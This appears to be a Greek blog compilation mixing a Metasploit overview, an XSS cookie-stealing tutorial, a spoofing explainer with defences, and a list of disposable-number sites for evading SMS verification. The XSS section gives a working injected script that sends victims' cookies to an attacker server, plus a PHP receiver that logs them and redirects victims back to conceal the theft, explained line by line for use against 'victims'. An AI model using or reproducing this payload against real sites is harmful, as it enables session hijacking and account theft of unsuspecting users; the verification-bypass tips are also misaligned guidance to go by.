Το Metasploit είναι ένα από τα πιο ισχυρά και δημοφιλή εργαλεία στον κόσμο της κυβερνοασφάλειας. Πρόκειται για ένα πλαίσιο ασφαλείας που χρησιμοποιείται για τη δοκιμή ασφάλειας συστημάτων και εφαρμογών. Αναπτύχθηκε αρχικά από την Rapid7 και τώρα είναι διαθέσιμο ως ανοικτού κώδικα λογισμικό.
Το Metasploit επιτρέπει στους ερευνητές ασφάλειας, τους επαγγελματίες κυβερνοασφάλειας και ακόμη και τους επιτιθέμενους να εκμεταλλευτούν ασφαλιστικές ελλείψεις σε συστήματα και εφαρμογές. Με τη χρήση του Metasploit, μπορείτε να ελέγξετε την ασφάλεια του συστήματός σας, να εντοπίσετε τυχόν ευπάθειες και να αναπτύξετε εκμεταλλευτικές επιθέσεις για να τις επιλύσετε προτού κακόβουλοι επιτιθέμενοι τις εκμεταλλευτούν.
Η χρήση του Metasploit περιλαμβάνει τα ακόλουθα βήματα:
Επιλογή Στόχου: Αρχικά, πρέπει να επιλέξετε τον στόχο που θέλετε να δοκιμάσετε ή να ελέγξετε την ασφάλειά του. Αυτό μπορεί να είναι ένας διακομιστής, μια εφαρμογή ή ακόμη και ένας υπολογιστής.
Σάρωση: Το Metasploit μπορεί να εκτελέσει σάρωση του στόχου για ευπάθειες και ανοιχτές πόρτες. Αυτό βοηθάει στην εντοπισμό πιθανών ευκαιριών για επίθεση.
Επίθεση: Με βάση τις ευπάθειες που ανακαλύψατε, μπορείτε να χρησιμοποιήσετε το Metasploit για να εκτελέσετε επιθέσεις. Αυτές μπορεί να είναι εκμεταλλευτικές επιθέσεις, όπως εισβολές σε αυτό το σύστημα ή την εφαρμογή.
Αξιολόγηση: Μετά την επίθεση, αξιολογείτε την αποτελεσματικότητα της και τυχόν πληροφορίες που αποκτήσατε.
Αναφορά: Το Metasploit παρέχει εκτενείς αναφορές και καταγραφές των επιθέσεών σας, κάτι που είναι σημαντικό για την κυβερνοασφάλεια και την επίλυση τυχόν ευπαθειών.
Το Metasploit είναι ένα εξαιρετικά χρήσιμο εργαλείο για τη δοκιμή ασφάλειας και την προστασία των συστημάτων από κυβερνοεπιθέσεις. Ωστόσο, πρέπει να χρησιμοποιείται με προσοχή, καθώς η ανοικτή χρήση του χωρίς την ανάλογη εξουσιοδότηση είναι παράνομη.
Για να χρησιμοποιήσετε το Metasploit με ασφάλεια και νοηματική ευθύνη, είναι σημαντικό να έχετε την άδεια και την εξουσιοδότηση για να δοκιμάσετε την ασφάλεια των συστημάτων ή των εφαρμογών που ανήκουν σε εσάς ή σε εκείνους που έχετε τη συγκατάθεσή τους. Πάντα πρέπει να τηρείτε τους νόμους περί κυβερνοασφάλειας και ιδιωτικότητας.
Εν κατακλείδι, το Metasploit είναι ένα εξαιρετικά ισχυρό εργαλείο για την ανίχνευση ευπαθειών και τη δοκιμή ασφάλειας. Ωστόσο, πρέπει να χρησιμοποιείται με προσοχή, ευθύνη και σεβασμό προς τους νόμους και την ιδιωτικότητα των άλλων. Με την κατάλληλη εκπαίδευση και τον ηθικό προσανατολισμό, μπορεί να συμβάλει στην ενίσχυση της κυβερνοασφάλειας και την προστασία από δυνητικούς κινδύνους στον ψηφιακό κόσμο.
Στον παρακάτω κώδικα θα δείτε πως μπορείτε να κλέψετε cookies κάνοντας επιθέσεις xss.
Ας ρίξουμε μια ματιά στο πρώτο script. Αυτό είναι το script/κώδικας που κάνετε inject στην σελίδα και το στέλνετε στο θύμα σας…
<script>
var server="192.168.1.6"; //your server var phpfl= "recvCookie.php"; //your php file to reiceve the cookie var getArg="data"; //the argument that will handle the data var path = "http://"+server+"/"+phpfl+"?"+getArg+"="+document.cookie;
window.open(path,"_self");
</script>
Το <script> λέει στον browser του θύματος ότι ο παρακάτω κώδικας είναι της γλώσσας javascript και το </script> δείχνει στον browser που τελειώνει αυτός ο κώδικας.
Οι επόμενες τέσσερις γραμμές είναι δικές μας μεταβλητές για να μπορούμε να μην τα έχουμε όλα μπερδεμένα…
Η πρώτη μεταβλητή είναι ο δικός μας server ο όποιος θα δέχεται τα δεδομένα των cookies από τους χρήστες που θα ανοίγουν τον παραπάνω κώδικα στον browser τους.
Η δεύτερή γραμμή δείχνει που είναι το αρχείο που θα επεξεργάζεται τα δεδομένα των cookies και θα τα γράφει σε κάποιο αρχείο για να μπορούμε να τα δούμε εμείς αργότερα…
Η τρίτη γραμμή είναι το argument που θα σταλθούν τα δεδομένα. Για να το περιγράψω με τον απλό τρόπο. Είναι η μεταβλητή στον σερβερ μας. Εκεί θα πάνε τα δεδομένα πριν τα γράψουμε σε κάποιο αρχείο.
Η τελευταία μεταβλητή το μόνο που κάνει είναι να τα ενώνει όλα μαζί.
βάζει αρχικά το http:// μπροστά. ακολουθεί η διεύθυνση του server μας. Το αρχείο κλπ… μέχρι που στο τέλος υπάρχει και το document.cookie. Αυτό διαβάζει τα δεδομένα για τα cookies που είναι στον browser του θύματος.
Το αποτέλεσμά αυτής της μεταβλητής θα μοιάζει κάπως έτσι:
path=http://myserver.com?recvCookie.php?data=[Dedomena twn cookies edw]
Και έχουμε μια ακόμα εντολή… Αυτή η εντολή κάνει redirect το θύμα μας στον server μας και μάλιστα στο path…. Τα υπόλοιπα τα αναλαμβάνει το php αρχείο το όποιο είναι στον δικό μας server!
<?php $target_site = "http://192.168.1.6"; //redirect back the user! //http/https is required date_default_timezone_set("UTC"); $fl = fopen("data_logs.html","a");
Το <?php λέει στον server μας ότι ο παρακάτω κώδικας έχει γραφτεί σε γλώσσα php. To ?> λέει ότι εκεί τελειώνει ο παραπάνω κώδικας που ήταν σε php
$target_site είναι μια μεταβλητή που αποθηκεύει το site που έχουμε χακαρεί. Αυτό το αποθηκεύουμε εκεί για να κάνουμε redirect το θύμα μας πίσω στο κανονικό site όταν τσιμπήσει, με αυτόν τον τρόπο δεν θα καταλάβει καν τι έγινε (αν είναι άσχετος)
date_default_timezone_set(“UTC”);
κάνει ακριβώς αυτό που λέει :p Θα το χρειαστούμε για να ξέρουμε τι ώρα τσίμπησε το θύμα μας. Μπορείτε να το αλλάξετε να είναι στην Έλλαδα. Αντί για UTC βάλτε greece
$fl = fopen(“data_logs.html”,”a”);
Αυτή η εντολή ανοίγει ένα αρχείο με το όνομα data_logs.html. Αν δεν υπάρχει το δημιουργεί. Αν υπάρχει τότε πηγαίνει τον κέρσορα στο τέλος του αρχείου. Με αυτόν τον τρόπο δεν διαγράφονται δεδομένα από προηγούμενα θύματα. Για να γράψουμε κάτι σε αυτό το αρχείο το κάνουμε με την fopen. To $fl βάζει τα πράγματα στο αρχείο… δεν είναι μεταβλητή (όχι με την έννοια τις μεταβλητής βασικά)
$data = $_GET[“data”];
Αυτό δεν χρειαζόταν… Αλλά ας έχουμε τα πράγματα τακτοποιημένα… Αυτό εδώ πηγαίνει τα δεδομένα από την μεταβλητή (argument) data στην μεταβλητή $data.
$_GET[“data”];
Αυτό εδώ έχει τα δεδομένα που έστειλε το προηγούμενο script. Για να μην το καλούμε όλο αυτό τα βάλαμε στην μεταβλητή $data…
Η πρώτη γραμμή γράφει στο αρχείο ένα html tag το όποιο λέει να τυπώνει τα δεδομένα όπως ακριβώς του τα δίνουμε (με χαρακτήρες νέας γραμμής κλπ)
Η δεύτερή γραμμή γράφει στο αρχείο την ημερομηνία και την ώρα που το θύμα μας στάλθηκε σε αυτό το αρχείο από τον κώδικα μας.
Η τρίτη γραμμή γράφει στο αρχείο τα δεδομένα που έστειλε ο κώδικας που εκτελέστηκε στον υπολογιστή του θύματος (δηλαδή τα cookies)
H τέταρτη γραμμή γράφει:,”————————-” για να ξέρουμε που τελειώνουν τα δεδομένα. Το \n είναι χαρακτήρας νέας γραμμής, είναι σαν να πατάω enter σε ένα έγγραφό κειμένου δηλαδή.
header("Location: ".$target_site); die();
η πρώτη γραμμή κάνει redirect τον χρήστη μας πίσω στην σελίδα που χακάραμε, με αυτόν τον τρόπο κάνουμε λίγο καμουφλάζ στην επίθεση και δεν καταλαβαίνει κάτι…
die()
σταματάει να εκτελεί κώδικα php στον server. Δεν είναι απαραίτητο εδώ. Αλλά αν υπάρξει θέμα (πχ δεν μπορεί να γράψει τα δεδομένα στο αρχείο και καθυστέρηση πολύ να τελειώσει το θύμα μας μπορεί να καταλάβει ότι κάνουμε επίθεση. το die σταματάει αυτήν την διαδικασία… και το redirect γίνετε κανονικά)
Τι είναι το Spoofing; Πώς λειτουργεί και πώς να το αποτρέψετε
Το spoofing είναι μια κακόβουλη εφαρμογή που συγκαλύπτει μια νόμιμη πηγή για να αποκτήσει ευαίσθητες πληροφορίες ή για να αποκτήσει πρόσβαση στις συσκευές των θυμάτων. Ένας κακόβουλος χρήστης μπορεί να σας παρασύρει στην πίστη ότι είναι από την πηγή με spoofing και έτσι να σας υποκλέψει προσωπικά στοιχεία ( social media κ.α )
Το spoofing είναι ένα είδος επίθεσης ( attack ) όπου “αυτό που βλέπουμε θα μοιάζει με αυτό, αλλά δεν είναι“.
Τύποι Spoofing
Email Spoofing:
Περίπου το 90% των Cyber Attacks πραγματοποιούνται μέσω μηνυμάτων ηλεκτρονικού ταχυδρομείου. Η ψευδαισθήσεις μέσω ηλεκτρονικού ταχυδρομείου είναι κάτι που ο εισβολέας στέλνει ένα μήνυμα ηλεκτρονικού ταχυδρομείου που θέτει ως νόμιμο αποστολέα, παραβιάζοντας τη διεύθυνση
“Από:” ( ή “from:” )την διεύθυνση, με αυτόν τον τρόπο το θύμα δεν θα παρατηρήσει τη διεύθυνση του αποστολέα και πέσει για τον εισβολέα.
Προστασία: Ελέγξτε τη διεύθυνση του αποστολέα εάν λαμβάνετε ανεπιθύμητο μήνυμα ηλεκτρονικού ταχυδρομείου και μην αποστέλλετε συνημμένα εκτός εάν ο αποστολέας είναι επαληθευμένος. επαληθεύστε την κεφαλίδα του email και βεβαιωθείτε ότι η διεύθυνση email αυτό είναι από κάποιο πραγματικό άτομο ( δηλαδή είναι πραγματική και δεν είναι ψεύτικη ). Spoofing κλήσεων:
Το Call Spoofing είναι μια περίεργη πρακτική στην οποία οι επιτιθέμενοι καλούν τους μισούς από τους αξιόπιστους οργανισμούς και αναζητούν προσωπικά στοιχεία όπως στοιχεία πιστωτικών καρτών και χρεωστικών καρτών, τραπεζικά στοιχεία και άλλα προσωπικά στοιχεία.
Προστασία: Μην εκθέτεται δημόσια τηλεφωνικά ευαίσθητες πληροφορίες σας, όπως στοιχεία πιστωτικών καρτών, στοιχεία τραπεζικού λογαριασμού ή αριθμό κοινωνικής ασφάλισης.
Spoofing ιστοτόπου:
Αυτή η επίθεση ονομάζεται τεχνικά phishing, όπου ο επιτιθέμενος δημιουργεί έναν ιστότοπο και μας παραπέμπει να εισαγάγουμε στοιχεία ( έτσι ώστε αυτομάτως να πάνε σε εκείνον ).
Προστασία: Ελέγχετε πάντα τη διεύθυνση URL του ιστότοπου προτού εισαγάγετε προσωπικά σας στοιχεία ( email, password αριθμούς κ.α ).
Εάν η διεύθυνση URL ΔΕΝ ταιριάζει με την αρχική διεύθυνση URL του ιστότοπου, μην εισάγετε διαπιστευτήρια.
ARP Spoofing:
Επέκταση ως Spoofing πρωτόκολλο ανάλυσης διευθύνσεων. Αυτή η αποτυχία είναι δύο τύπων,
Spoofing IP: Ο εισβολέας βρίσκει την ιδιωτική διεύθυνση IP και κόβει το δρομολογητή πιστεύοντας ότι είναι επίσης από το ίδιο δίκτυο.
Συνήθως, αυτή η επίθεση γίνεται για να αποκτήσετε πρόσβαση σε ένα διακομιστή ο οποίος είναι προσβάσιμος μόνο για συγκεκριμένα συστήματα μέσα σε ένα δίκτυο.
Προστασία: Μείωση του υποδικτύου και εκκαθάριση του αρχείου καταγραφής κενών διευθύνσεων IP θα μειώσει αυτόν τον τύπο επίθεσης.
MAC Spoofing:
Όλοι μας γνωρίζουμε ότι η MAC διεύθυνση είναι η μόνιμη διεύθυνση που δίνεται από τον κατασκευαστή. Και ο επιτιθέμενος μπορεί να παραβιάσει τη διεύθυνση MAC ενός συγκεκριμένου συστήματος μέσα σε ένα δίκτυο για να αποκτήσει παράνομη πρόσβαση σε ένα διακομιστή.
Προστασία: Η εγκατάσταση φίλτρων πακέτων ή δυναμικών ελέγχων ARP θα μειώσει αυτόν τον τύπο επιθέσεων Spoofing.
Δωρεάν Verification χωρίς πραγματικό αριθμό τηλεφώνου.
Πιστεύω όλοι έχουμε πάει να κάνουμε ηλεκτρονικές αγορές, ή να φτιάξουμε λογαριασμός στα Social Media σωστά;
Πιστεύω όλοι έχουμε δει αυτό την επιλογή που λέει να προσθέσουμε τον αριθμό κινητού μας έτσι ώστε να μας στείλουν έναν κωδικό επιβεβαιώσεις σωστά;
Πάρα πολλά άτομα ξενερώνουν με την Ανωνυμία επειδή αναγκάζονται να προσθέσουν τα προσωπικά τους στοιχεία ( όπως τον αριθμό τους ).
Σήμερα θα σας δείξω έναν πολύ απλό τρόπο έτσι ώστε να κάνετε αγορές καθώς και λογαριασμούς χωρίς να προσθέτετε τα προσωπικά σας στοιχεία.
Temp-SMS
https://temp-sms.org/sms/642108797516
Αυτός ο ιστότοπος είναι πολύ παρόμοιος με το temp mail – sms, αλλά σε αυτόν τον ιστότοπο μπορείτε να πάρετε έναν αριθμό EN , υπάρχει όμως μια μικρή περίπτωση
μερική ιστότοποι να μην μπορούν να επιβεβαιώσουν τον αριθμό αυτόν οπότε πρέπει να δείτε και άλλους συνδέσμους.
7sim
https://7sim.org/free-phone-number-45MwGrzN
Αυτός ο ιστότοπος είναι ένας άλλος πολύ καλός ιστότοπος που έχω χρησιμοποιήσει και δίνει έναν πραγματικά περίεργο αριθμό όπως το 570, αλλά μπορείτε να πάρετε έναν αριθμό από το Ηνωμένο Βασίλειο ( παράδειγμα ) και να περάσετε από το yahoo και άλλους ιστότοπους με αυτό το ελεύθερο site ελέγχου sms.
http://freesmsverification.com/
k7.net – Αυτή η χρήση για δωρεάν Verifications δουλεύει τέλεια σε όλα τα site για οποιαδήποτε χώρα!
Το site αυτό έχει κατασκευαστή για να σας δώσει έναν αριθμό που ήταν σαν έναν πραγματικό αριθμό τηλεφώνου και ήταν glitchy δεδομένου ότι δεν προσφέρουν sms, αλλά θα μπορούσατε να χρησιμοποιήσετε τη φωνητική επαλήθευση επειδή με την επιβεβαίωση του αριθμού αμέσως θα πάρετε ένα φωνητικό μήνυμα και θα λάβετε τους κωδικούς επαλήθευσης σας δυστυχώς, ξεκίνησαν αυτό το site αντιμετωπίζει μερικές φορές θέματα όταν πηγαίνετε στο k7 και προσπαθήστε να πάρετε έναν αριθμό, αν το κάνετε αυτό και σας βγάλει κάποιο σφάλμα, απλά θα σας ανακατευθύνει σε εκεί νέο site που προσφέρει μόνο 800 αριθμούς.
Οι 800 αριθμοί ενδέχεται να μην δουλεύουν σχεδόν καθόλου για την επαλήθευση.
Για να περάσει την επαλήθευση των sms στο gmail παράδειγμα δοκιμάστε της παραπάνω μεθόδους που έγραψα.
Είναι μια μέθοδος που για εμένα δούλεψε, αυτό θα σας βοηθήσει στο να ξεφύγετε ακόμη και να χρειαστεί να χρησιμοποιήσετε έναν αριθμό τηλεφώνου, σας προτείνω αυτή τη μέθοδο.
Μερικά ακόμα links για δωρεάν verifications numbers: